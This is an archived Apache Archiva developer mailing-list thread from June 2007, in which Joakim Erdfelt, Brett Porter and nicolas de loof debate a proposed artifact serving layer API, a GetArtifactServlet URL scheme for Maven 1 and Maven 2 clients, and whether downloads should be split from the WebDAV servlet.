focus on #1, Getting an artifact from Archiva. > (As for #2, that can remain the realm of the current DavServlet > implementation) > > I always pictured this as a new GetArtifactServlet. > > Lets say we have it mapped to the "/get" servlet mapping. > The following urls would all point to the same artifact. > > : Basic Format for maven 1 clients. > > http://hostname.com/archiva/get/maven1/org.apache.maven.wagon/jars/wagon-scm-1.0-alpha-3.jar > : Basic Format for maven 2 clients. > > http://hostname.com/archiva/get/maven2/org/apache/maven/wagon/wagon-scm/1.0-alpha-3/wagon-scm-1.0-alpha-3.jar > > : (Advanced / Future Use) apt/deb serving. > > http://hostname.com/archiva/get/apt-deb/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.deb > : (Advanced / Future Use) yum/rpm serving. > > http://hostname.com/archiva/get/yum-rpm/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.rpm > > Using a new servlet, would essentially decouple the filesystem > format/layout as a requirement. > Archiva can assume maven 2 format for the filesystem, and serve the > artifact to the client in the way that is requested. After all the artifact > information is now in the database. It makes sense to me to do it this way. > > The idea with the URL format is that > "/get/{implementation-id}/{artifact-reference-implementation-format}" > > The implementation id can be a plexus role-hint on the implementation of > this GetArtifactServlet. > > What do you think? > > - Joakim > > nicolas de loof wrote: > > Hello, > > To enhance archiva-1.0 support for maven1, I'd like to introduce a layer > between DavServlet and repository proxies connectors. > As Joakim suggested, this is the scope of the Dynamic Artifact Serving > Layer > in archiva roadmap. > > I propose this API : > > public interface ArtifactServingLayer > { > /** > * Retrieve an artifact path in the repository based on the resource > string. > */ > public String getResourcePath( String resource ); > } > > The serving layer is responsible of finding the resource in the managed > repository, with any required logic or temporary content, and to give a > repository-related path back to the DavServer. > > The default implementation could simply use proxies-connectors to find the > > resource, and some interceptors / proxies could add features, like > converting on-the-fly from a layout format to the managedRepository > layout, > handle artifact relocation when a non-POM artifact is requested, or > anything > we discover to be usefull. > > What's your opinion ? > > > ------=_Part_22947_7996697.1181067508575-- From [email protected] Tue Jun 05 19:12:24 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73941 invoked from network); 5 Jun 2007 19:12:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 19:12:22 -0000 Received: (qmail 71242 invoked by uid 500); 5 Jun 2007 19:12:26 -0000 Delivered-To: [email protected] Received: (qmail 71202 invoked by uid 500); 5 Jun 2007 19:12:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71193 invoked by uid 99); 5 Jun 2007 19:12:26 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 12:12:26 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx05.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 12:12:20 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAF9SZUY6sjq3/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,386,1175436000"; d="scan'208";a="49660303" Received: from 183.129.dsl.syd.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp05.syd.iprimus.net.au with ESMTP; 06 Jun 2007 05:11:57 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: service layer API proposal Date: Wed, 6 Jun 2007 05:11:55 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org I agree. Any reason we can't use detection? Also, any reason why the handler for downloading from the / repository/ can't be this get servlet instead of dav servlet? We probably don't want to add new ways to download from the repository for the same reason we removed /proxy/. I realise you can only map one servlet, but the servlet could delegate all operations other than get() to the dav implementation. Anyway, not really sure of the implementation, just don't like 'get' as a name :) I also don't agree on the repository storage format. I don't see any reason this can't be configurable, and I think it's useful to be able to run on an existing repo, or should we ever change the m2 format in future. - Brett On 06/06/2007, at 4:18 AM, nicolas de loof wrote: > The "/get/{implementation-id}/{layout-path}" is an interesting option. > > Where would you place the target managed repository in such an URL ? > > The only thing I don't like in this solution is that it doesn't > work based > on an auto-detection of the requested format. I'd prefer the > servlet to > search for an implementation that accepts the requested path, so > that the > current "/repository/id/{layout}" would be valid for any supported > layout. > > > 2007/6/5, Joakim Erdfelt <[email protected]>: >> >> We have 2 concepts that are co-mingled right now. >> >> 1) Getting an artifact from Archiva. >> 2) Deploying an artifact to Archiva. >> >> This proposal should focus on #1, Getting an artifact from Archiva. >> (As for #2, that can remain the realm of the current DavServlet >> implementation) >> >> I always pictured this as a new GetArtifactServlet. >> >> Lets say we have it mapped to the "/get" servlet mapping. >> The following urls would all point to the same artifact. >> >> : Basic Format for maven 1 clients. >> >> http://hostname.com/archiva/get/maven1/org.apache.maven.wagon/jars/ >> wagon-scm-1.0-alpha-3.jar >> : Basic Format for maven 2 clients. >> >> http://hostname.com/archiva/get/maven2/org/apache/maven/wagon/ >> wagon-scm/1.0-alpha-3/wagon-scm-1.0-alpha-3.jar >> >> : (Advanced / Future Use) apt/deb serving. >> >> http://hostname.com/archiva/get/apt-deb/org.apache.maven.wagon/ >> wagon-scm-1.0-alpha-3.deb >> : (Advanced / Future Use) yum/rpm serving. >> >> http://hostname.com/archiva/get/yum-rpm/org.apache.maven.wagon/ >> wagon-scm-1.0-alpha-3.rpm >> >> Using a new servlet, would essentially decouple the filesystem >> format/layout as a requirement. >> Archiva can assume maven 2 format for the filesystem, and serve the >> artifact to the client in the way that is requested. After all >> the artifact >> information is now in the database. It makes sense to me to do it >> this way. >> >> The idea with the URL format is that >> "/get/{implementation-id}/{artifact-reference-implementation-format}" >> >> The implementation id can be a plexus role-hint on the >> implementation of >> this GetArtifactServlet. >> >> What do you think? >> >> - Joakim >> >> nicolas de loof wrote: >> >> Hello, >> >> To enhance archiva-1.0 support for maven1, I'd like to introduce a >> layer >> between DavServlet and repository proxies connectors. >> As Joakim suggested, this is the scope of the Dynamic Artifact >> Serving >> Layer >> in archiva roadmap. >> >> I propose this API : >> >> public interface ArtifactServingLayer >> { >> /** >> * Retrieve an artifact path in the repository based on the >> resource >> string. >> */ >> public String getResourcePath( String resource ); >> } >> >> The serving layer is responsible of finding the resource in the >> managed >> repository, with any required logic or temporary content, and to >> give a >> repository-related path back to the DavServer. >> >> The default implementation could simply use proxies-connectors to >> find the >> >> resource, and some interceptors / proxies could add features, like >> converting on-the-fly from a layout format to the managedRepository >> layout, >> handle artifact relocation when a non-POM artifact is requested, or >> anything >> we discover to be usefull. >> >> What's your opinion ? >> >> >> From [email protected] Tue Jun 05 19:45:58 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84721 invoked from network); 5 Jun 2007 19:45:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 19:45:58 -0000 Received: (qmail 36409 invoked by uid 500); 5 Jun 2007 19:46:01 -0000 Delivered-To: [email protected] Received: (qmail 36383 invoked by uid 500); 5 Jun 2007 19:46:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36370 invoked by uid 99); 5 Jun 2007 19:46:01 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 12:46:01 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 12:45:56 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 4A30D4803C for <[email protected]>; Tue, 5 Jun 2007 19:45:35 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id EC9174801A for <[email protected]>; Tue, 5 Jun 2007 19:45:34 +0000 (UTC) Message-ID: <[email protected]> Date: Tue, 05 Jun 2007 15:51:32 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: service layer API proposal References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org Splitting up this discussion ... First is the "detection" of clients. Archiva has to manage not only the artifact, but also the pom/model version too. Example: A maven 2 client can request either of these format URLs. http://machine.com/repository/internal/commons-lang/poms/commons-lang-2.1.pom http://machine.com/repository/internal/commons-lang/commons-lang/2.1/commons-lang-2.1.pom On maven 2, these can both be of model version 4.0.0 and it'll work. On maven 1, these have to be model version 3.0.0 to work. Oh if only the client could identify itself, then wouldn't be a problem. :-) The reason for the "/get/{implementation-id}/{layout-path}" is to clearly identify the intent of the client, and compensate/migrate/regenerate/translate the requested resource for the client. It is clear, not overloaded. As it stands now, the bidirectional layout has a tough time with maven 1 layout requests of non-typical artifact types (seen commonly in corporate environments). The lack of a acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b1 relationship between file extension and artifact type makes things even more difficult for "detection". In short, I thoroughly dislike the idea of detecting the serving layer based on path information. I see it as a band-aide, a short term solution, one that will cause a mess of spaghetti code in the Repository servlet. When we move to other artifact providing concepts, yum/apt/osgi, etc... there is tremendous overlap on the path structure, so much so that this detection route is just a dead-end to me. - Joakim Brett Porter wrote: > I agree. Any reason we can't use detection? > > Also, any reason why the handler for downloading from the /repository/ > can't be this get servlet instead of dav servlet? We probably don't > want to add new ways to download from the repository for the same > reason we removed /proxy/. I realise you can only map one servlet, but > the servlet could delegate all operations other than get() to the dav > implementation. > > Anyway, not really sure of the implementation, just don't like 'get' > as a name :) > > I also don't agree on the repository storage format. I don't see any > reason this can't be configurable, and I think it's useful to be able > to run on an existing repo, or should we ever change the m2 format in > future. > > - Brett > > On 06/06/2007, at 4:18 AM, nicolas de loof wrote: > >> The "/get/{implementation-id}/{layout-path}" is an interesting option. >> >> Where would you place the target managed repository in such an URL ? >> >> The only thing I don't like in this solution is that it doesn't work >> based >> on an auto-detection of the requested format. I'd prefer the servlet to >> search for an implementation that accepts the requested path, so that >> the >> current "/repository/id/{layout}" would be valid for any supported >> layout. >> >> >> 2007/6/5, Joakim Erdfelt <[email protected]>: >>> >>> We have 2 concepts that are co-mingled right now. >>> >>> 1) Getting an artifact from Archiva. >>> 2) Deploying an artifact to Archiva. >>> >>> This proposal should focus on #1, Getting an artifact from Archiva. >>> (As for #2, that can remain the realm of the current DavServlet >>> implementation) >>> >>> I always pictured this as a new GetArtifactServlet. >>> >>> Lets say we have it mapped to the "/get" servlet mapping. >>> The following urls would all point to the same artifact. >>> >>> : Basic Format for maven 1 clients. >>> >>> http://hostname.com/archiva/get/maven1/org.apache.maven.wagon/jars/wagon-scm-1.0-alpha-3.jar >>> >>> : Basic Format for maven 2 clients. >>> >>> http://hostname.com/archiva/get/maven2/org/apache/maven/wagon/wagon-scm/1.0-alpha-3/wagon-scm-1.0-alpha-3.jar >>> >>> >>> : (Advanced / Future Use) apt/deb serving. >>> >>> http://hostname.com/archiva/get/apt-deb/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.deb >>> >>> : (Advanced / Future Use) yum/rpm serving. >>> >>> http://hostname.com/archiva/get/yum-rpm/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.rpm >>> >>> >>> Using a new servlet, would essentially decouple the filesystem >>> format/layout as a requirement. >>> Archiva can assume maven 2 format for the filesystem, and serve the >>> artifact to the client in the way that is requested. After all the >>> artifact >>> information is now in the database. It makes sense to me to do it >>> this way. >>> >>> The idea with the URL format is that >>> "/get/{implementation-id}/{artifact-reference-implementation-format}" >>> >>> The implementation id can be a plexus role-hint on the >>> implementation of >>> this GetArtifactServlet. >>> >>> What do you think? >>> >>> - Joakim >>> >>> nicolas de loof wrote: >>> >>> Hello, >>> >>> To enhance archiva-1.0 support for maven1, I'd like to introduce a >>> layer >>> between DavServlet and repository proxies connectors. >>> As Joakim suggested, this is the scope of the Dynamic Artifact Serving >>> Layer >>> in archiva roadmap. >>> >>> I propose this API : >>> >>> public interface ArtifactServingLayer >>> { >>> /** >>> * Retrieve an artifact path in the repository based on the resource >>> string. >>> */ >>> public String getResourcePath( String resource ); >>> } >>> >>> The serving layer is responsible of finding the resource in the managed >>> repository, with any required logic or temporary content, and to give a >>> repository-related path back to the DavServer. >>> >>> The default implementation could simply use proxies-connectors to >>> find the >>> >>> resource, and some interceptors / proxies could add features, like >>> converting on-the-fly from a layout format to the managedRepository >>> layout, >>> handle artifact relocation when a non-POM artifact is requested, or >>> anything >>> we discover to be usefull. >>> >>> What's your opinion ? >>> >>> >>> > -- - Joakim Erdfelt [email protected] Open Source Software (OSS) Developer From [email protected] Tue Jun 05 19:51:18 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87448 invoked from network); 5 Jun 2007 19:51:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 19:51:17 -0000 Received: (qmail 47449 invoked by uid 500); 5 Jun 2007 19:51:20 -0000 Delivered-To: [email protected] Received: (qmail 47413 invoked by uid 500); 5 Jun 2007 19:51:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47404 invoked by uid 99); 5 Jun 2007 19:51:20 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 12:51:20 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 12:51:16 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 05C214803C for <[email protected]>; Tue, 5 Jun 2007 19:50:55 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id AA4F94801A for <[email protected]>; Tue, 5 Jun 2007 19:50:54 +0000 (UTC) Message-ID: <[email protected]> Date: Tue, 05 Jun 2007 15:56:52 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: absconding GET from webdav - was ( Re: service layer API proposal ) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org Second is the assumption that "GET" requests are not webdav requests. Some WebDav client implementations improperly use the "GET" request to obtain file/folder information. (they should be using the various xml/propget requests to obtain that list.) We could likely make it work, but in the process would reduce our already limited list of webdav clients down further. /me [email protected]. (OSX's webdav client cannot be used against Archiva, due to bugs in the client) - Joakim Brett Porter wrote: > I agree. Any reason we can't use detection? > > Also, any reason why the handler for downloading from the /repository/ > can't be this get servlet instead of dav servlet? We probably don't > want to add new ways to download from the repository for the same > reason we removed /proxy/. I realise you can only map one servlet, but > the servlet could delegate all operations other than get() to the dav > implementation. > > Anyway, not really sure of the implementation, just don't like 'get' > as a name :) > > I also don't agree on the repository storage format. I don't see any > reason this can't be configurable, and I think it's useful to be able > to run on an existing repo, or should we ever change the m2 format in > future. > > - Brett > > On 06/06/2007, at 4:18 AM, nicolas de loof wrote: > >> The "/get/{implementation-id}/{layout-path}" is an interesting option. >> >> Where would you place the target managed repository in such an URL ? >> >> The only thing I don't like in this solution is that it doesn't work >> based >> on an auto-detection of the requested format. I'd prefer the servlet to >> search for an implementation that accepts the requested path, so that >> the >> current "/repository/id/{layout}" would be valid for any supported >> layout. >> >> >> 2007/6/5, Joakim Erdfelt <[email protected]>: >>> >>> We have 2 concepts that are co-mingled right now. >>> >>> 1) Getting an artifact from Archiva. >>> 2) Deploying an artifact to Archiva. >>> >>> This proposal should focus on #1, Getting an artifact from Archiva. >>> (As for #2, that can remain the realm of the current DavServlet >>> implementation) >>> >>> I always pictured this as a new GetArtifactServlet. >>> >>> Lets say we have it mapped to the "/get" servlet mapping. >>> The following urls would all point to the same artifact. >>> >>> : Basic Format for maven 1 clients. >>> >>> http://hostname.com/archiva/get/maven1/org.apache.maven.wagon/jars/wagon-scm-1.0-alpha-3.jar >>> >>> : Basic Format for maven 2 clients. >>> >>> http://hostname.com/archiva/get/maven2/org/apache/maven/wagon/wagon-scm/1.0-alpha-3/wagon-scm-1.0-alpha-3.jar >>> >>> >>> : (Advanced / Future Use) apt/deb serving. >>> >>> http://hostname.com/archiva/get/apt-deb/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.deb >>> >>> : (Advanced / Future Use) yum/rpm serving. >>> >>> http://hostname.com/archiva/get/yum-rpm/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.rpm >>> >>> >>> Using a new servlet, would essentially decouple the filesystem >>> format/layout as a requirement. >>> Archiva can assume maven 2 format for the filesystem, and serve the >>> artifact to the client in the way that is requested. After all the >>> artifact >>> information is now in the database. It makes sense to me to do it >>> this way. >>> >>> The idea with the URL format is that >>> "/get/{implementation-id}/{artifact-reference-implementation-format}" >>> >>> The implementation id can be a plexus role-hint on the >>> implementation of >>> this GetArtifactServlet. >>> >>> What do you think? >>> >>> - Joakim >>> >>> nicolas de loof wrote: >>> >>> Hello, >>> >>> To enhance archiva-1.0 support for maven1, I'd like to introduce a >>> layer >>> between DavServlet and repository proxies connectors. >>> As Joakim suggested, this is the scope of the Dynamic Artifact Serving >>> Layer >>> in archiva roadmap. >>> >>> I propose this API : >>> >>> public interface ArtifactServingLayer >>> { >>> /** >>> * Retrieve an artifact path in the repository based on the resource >>> string. >>> */ >>> public String getResourcePath( String resource ); >>> } >>> >>> The serving layer is responsible of finding the resource in the managed >>> repository, with any required logic or temporary content, and to give a >>> repository-related path back to the DavServer. >>> >>> The default implementation could simply use proxies-connectors to >>> find the >>> >>> resource, and some interceptors / proxies could add features, like >>> converting on-the-fly from a layout format to the managedRepository >>> layout, >>> handle artifact relocation when a non-POM artifact is requested, or >>> anything >>> we discover to be usefull. >>> >>> What's your opinion ? >>> From [email protected] Wed Jun 06 05:51:02 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26772 invoked from network); 6 Jun 2007 05:51:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2007 05:51:01 -0000 Received: (qmail 29075 invoked by uid 500); 6 Jun 2007 05:51:04 -0000 Delivered-To: [email protected] Received: (qmail 29035 invoked by uid 500); 6 Jun 2007 05:51:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29026 invoked by uid 99); 6 Jun 2007 05:51:04 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 22:51:04 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx06.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 22:50:59 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAKrnZUbTGyqP/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,388,1175436000"; d="scan'208";a="50081461" Received: from unknown (HELO [161.129.204.104]) ([161.129.204.104]) by smtp06.syd.iprimus.net.au with ESMTP; 06 Jun 2007 15:50:36 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: absconding GET from webdav - was ( Re: service layer API proposal ) Date: Wed, 6 Jun 2007 15:50:30 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org Ok, while I'd definitely prefer to make it work, if it can't then I'd prefer we made the change in the other direction (the default repository URL is get only, we have /repository-id/webdav/ as the webdav exposure point). - Brett On 06/06/2007, at 5:56 AM, Joakim Erdfelt wrote: > Second is the assumption that "GET" requests are not webdav requests. > > Some WebDav client implementations improperly use the "GET" request > to obtain file/folder information. (they should be using the > various xml/propget requests to obtain that list.) > > We could likely make it work, but in the process would reduce our > already limited list of webdav clients down further. > > /me [email protected]. > > (OSX's webdav client cannot be used against Archiva, due to bugs in > the client) > > - Joakim > > Brett Porter wrote: >> I agree. Any reason we can't use detection? >> >> Also, any reason why the handler for downloading from the / >> repository/ can't be this get servlet instead of dav servlet? We >> probably don't want to add new ways to download from the >> repository for the same reason we removed /proxy/. I realise you >> can only map one servlet, but the servlet could delegate all >> operations other than get() to the dav implementation. >> >> Anyway, not really sure of the implementation, just don't like >> 'get' as a name :) >> >> I also don't agree on the repository storage format. I don't see >> any reason this can't be configurable, and I think it's useful to >> be able to run on an existing repo, or should we ever change the >> m2 format in future. >> >> - Brett >> >> On 06/06/2007, at 4:18 AM, nicolas de loof wrote: >> >>> The "/get/{implementation-id}/{layout-path}" is an interesting >>> option. >>> >>> Where would you place the target managed repository in such an URL ? >>> >>> The only thing I don't like in this solution is that it doesn't >>> work based >>> on an auto-detection of the requested format. I'd prefer the >>> servlet to >>> search for an implementation that accepts the requested path, so >>> that the >>> current "/repository/id/{layout}" would be valid for any >>> supported layout. >>> >>> >>> 2007/6/5, Joakim Erdfelt <[email protected]>: >>>> >>>> We have 2 concepts that are co-mingled right now. >>>> >>>> 1) Getting an artifact from Archiva. >>>> 2) Deploying an artifact to Archiva. >>>> >>>> This proposal should focus on #1, Getting an artifact from Archiva. >>>> (As for #2, that can remain the realm of the current DavServlet >>>> implementation) >>>> >>>> I always pictured this as a new GetArtifactServlet. >>>> >>>> Lets say we have it mapped to the "/get" servlet mapping. >>>> The following urls would all point to the same artifact. >>>> >>>> : Basic Format for maven 1 clients. >>>> >>>> http://hostname.com/archiva/get/maven1/org.apache.maven.wagon/ >>>> jars/wagon-scm-1.0-alpha-3.jar >>>> : Basic Format for maven 2 clients. >>>> >>>> http://hostname.com/archiva/get/maven2/org/apache/maven/wagon/ >>>> wagon-scm/1.0-alpha-3/wagon-scm-1.0-alpha-3.jar >>>> >>>> : (Advanced / Future Use) apt/deb serving. >>>> >>>> http://hostname.com/archiva/get/apt-deb/org.apache.maven.wagon/ >>>> wagon-scm-1.0-alpha-3.deb >>>> : (Advanced / Future Use) yum/rpm serving. >>>> >>>> http://hostname.com/archiva/get/yum-rpm/org.apache.maven.wagon/ >>>> wagon-scm-1.0-alpha-3.rpm >>>> >>>> Using a new servlet, would essentially decouple the filesystem >>>> format/layout as a requirement. >>>> Archiva can assume maven 2 format for the filesystem, and serve the >>>> artifact to the client in the way that is requested. After all >>>> the artifact >>>> information is now in the database. It makes sense to me to do >>>> it this way. >>>> >>>> The idea with the URL format is that >>>> "/get/{implementation-id}/{artifact-reference-implementation- >>>> format}" >>>> >>>> The implementation id can be a plexus role-hint on the >>>> implementation of >>>> this GetArtifactServlet. >>>> >>>> What do you think? >>>> >>>> - Joakim >>>> >>>> nicolas de loof wrote: >>>> >>>> Hello, >>>> >>>> To enhance archiva-1.0 support for maven1, I'd like to introduce >>>> a layer >>>> between DavServlet and repository proxies connectors. >>>> As Joakim suggested, this is the scope of the Dynamic Artifact >>>> Serving >>>> Layer >>>> in archiva roadmap. >>>> >>>> I propose this API : >>>> >>>> public interface ArtifactServingLayer >>>> { >>>> /** >>>> * Retrieve an artifact path in the repository based on the >>>> resource >>>> string. >>>> */ >>>> public String getResourcePath( String resource ); >>>> } >>>> >>>> The serving layer is responsible of finding the resource in the >>>> managed >>>> repository, with any required logic or temporary content, and to >>>> give a >>>> repository-related path back to the DavServer. >>>> >>>> The default implementation could simply use proxies-connectors >>>> to find the >>>> >>>> resource, and some interceptors / proxies could add features, like >>>> converting on-the-fly from a layout format to the managedRepository >>>> layout, >>>> handle artifact relocation when a non-POM artifact is requested, or >>>> anything >>>> we discover to be usefull. >>>> >>>> What's your opinion ? >>>> From [email protected] Wed Jun 06 05:52:00 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30006 invoked from network); 6 Jun 2007 05:51:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2007 05:51:59 -0000 Received: (qmail 30341 invoked by uid 500); 6 Jun 2007 05:52:03 -0000 Delivered-To: [email protected] Received: (qmail 30229 invoked by uid 500); 6 Jun 2007 05:52:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30220 invoked by uid 99); 6 Jun 2007 05:52:02 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 22:52:02 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx06.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 22:51:57 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAKrnZUbTGyqP/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,388,1175436000"; d="scan'208";a="50081683" Received: from unknown (HELO [161.129.204.104]) ([161.129.204.104]) by smtp06.syd.iprimus.net.au with ESMTP; 06 Jun 2007 15:51:36 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: service layer API proposal Date: Wed, 6 Jun 2007 15:51:30 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org Ok, I'm on board with specifying the exposed interfaces, but a few comments first to help my understanding. On 06/06/2007, at 5:51 AM, Joakim Erdfelt wrote: > On maven 2, these can both be of model version 4.0.0 and it'll work. > On maven 1, these have to be model version 3.0.0 to work. > > Oh if only the client could identify itself, then wouldn't be a > problem. :-) We've made a concious decision not to store both poms in the repository for a given artifact though, so this is the client's responsibility to deal with it. > > The reason for the "/get/{implementation-id}/{layout-path}" is to > clearly identify the intent of the client, and compensate/migrate/ > regenerate/translate the requested resource for the client. It is > clear, not overloaded. > > As it stands now, the bidirectional layout has a tough time with > maven 1 layout requests of non-typical artifact types (seen > commonly in corporate environments). The lack of a acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b1 > relationship between file extension and artifact type makes things > even more difficult for "detection". I'm not sure I understand why this would be given the type is in the path. I haven't looked at this code since it was refactored, but in repoclean and the subsequent converter there was admittedly quite a bit of trickery to handle many variants but it was centralised. > > In short, I thoroughly dislike the idea of detecting the serving > layer based on path information. > I see it as a band-aide, a short term solution, one that will cause > a mess of spaghetti code in the Repository servlet. I can't see how that is the case if the complexity is isolated to the bidirectional layout. Is this an issue for the converter now? > > When we move to other artifact providing concepts, yum/apt/osgi, > etc... there is tremendous overlap on the path structure, so much > so that this detection route is just a dead-end to me. This makes sense to me, though I would prefer better URLs and a decent default (see other thread). I'm not overly excited about diving into all this for 1.0 though - the only requirements I'd see for 1.0 are that it can work with existing Maven 1 repository contents (ie, filesystem structure) and Maven 1 clients. - Brett From [email protected] Wed Jun 06 06:50:34 2007 